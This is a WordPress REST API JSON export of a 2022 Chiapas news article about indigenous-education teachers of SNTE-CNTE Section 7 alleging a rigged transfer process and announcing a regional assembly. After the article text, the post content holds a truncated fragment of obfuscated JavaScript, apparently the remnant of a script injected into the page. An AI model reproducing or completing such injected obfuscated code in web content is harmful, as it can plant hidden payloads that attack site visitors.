{"id":4559,"date":"2022-08-20T00:02:16","date_gmt":"2022-08-20T00:02:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4559"},"modified":"2022-08-20T00:02:17","modified_gmt":"2022-08-20T00:02:17","slug":"maestros-tomaran-acciones-por-cadenas-de-cambios-irregular","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4559","title":{"rendered":"Maestros tomar\u00e1n acciones por cadenas de cambios irregular"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-07-06-at-3.24.23-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-4560\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-07-06-at-3.24.23-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-07-06-at-3.24.23-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-07-06-at-3.24.23-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-07-06-at-3.24.23-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Maestros del Nivel de Educaci\u00f3n Ind\u00edgena  (NEI) de la Secci\u00f3n 7 del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE) anunciaron que el pr\u00f3ximo lunes 22 de agosto, realizar\u00e1n su asamblea regional masiva, a partir de las 9 de la ma\u00f1ana en el Estadio de Futbol, Hugo Isaac Robles Guillen de esta ciudad, con la finalidad de analizar \u201cla corrupci\u00f3n\u201d que hubo por parte de las autoridades educativas en la pasada Cadena de Cambios que se dio. En conferencia de prensa, el coordinador del NEI en la zona altos, Sergio G\u00f3mez Mart\u00ednez, asegur\u00f3 que muchos espacios no fueron ofertados, y muchos de sus compa\u00f1eros que oscilan entre los 25 a\u00f1os, no ocuparon espacios en la regi\u00f3n Altos, \u201cuna cadena de cambio violatoria, lo hicieron de manera virtual, para que nadie reclamara\u201d. \u201cEn el momento que los compa\u00f1eros reclamaban en autom\u00e1tico los eliminaban del grupo, fue una cadena de cambio ama\u00f1ada, acorde a los intereses de la autoridad educativa y donde muchos maestros se les violento el derecho de antig\u00fcedad, de 5 a 6 muchos compa\u00f1eros les quitaron, oscilan entre 500 compa\u00f1eros, fueron alrededor de mil  500 quienes solicitaron o se metieron a la cadena de cambio, de esos 200 los eliminaron en autom\u00e1tico, porque seg\u00fan la autoridad no cumplieron con los requisitos \u201c, dijeron. Detall\u00f3 que en la reuni\u00f3n masiva del pr\u00f3ximo lunes, buscar\u00e1n fijar su posicionamiento, ante los cursos que intentan imponer a sus compa\u00f1eros, adem\u00e1s del intento de imposici\u00f3n a aumentar la jornada laboral, \u201ccuando uno trabaja horas extras el patr\u00f3n te debe pagar. El doble, pero resulta que por hora se le pretende pagar 60 por hora, con un m\u00e1ximo de 4 horas al d\u00eda, y quienes van a pagar esto son los comit\u00e9s de educaci\u00f3n, no las autoridades, ellos van a valorar\u201d. G\u00f3mez Mart\u00ednez dej\u00f3 en claro que en el caso de maestros de la secci\u00f3n 7 del NEI, han estado laborando de manera normal y sin protocolos de seguridad por el COVID, y aun as\u00ed, la imposici\u00f3n en el pago de horas extras por los comit\u00e9s, buscan que ellos se confronten con las comunidades. Urgieron la publicaci\u00f3n de la convocatoria para el relevo de la dirigencia estatal, que se ha venido retrasando desde hace un a\u00f1o que venci\u00f3 el a\u00f1o pasado, \u201ces indudable que estamos invitando a los compa\u00f1eros al proyecto que encabeza Manuel de Jes\u00fas Mendoza V\u00e1zquez\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Maestros del Nivel de Educaci\u00f3n Ind\u00edgena (NEI) de la Secci\u00f3n 7 del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE) anunciaron que el pr\u00f3ximo lunes 22 de agosto, realizar\u00e1n su asamblea regional masiva, a partir de las 9 de la ma\u00f1ana en el Estadio de Futbol, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4560,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4559","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4559"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4559\/revisions"}],"predecessor-version":[{"id":4561,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4559\/revisions\/4561"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4560"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4559"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4559"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}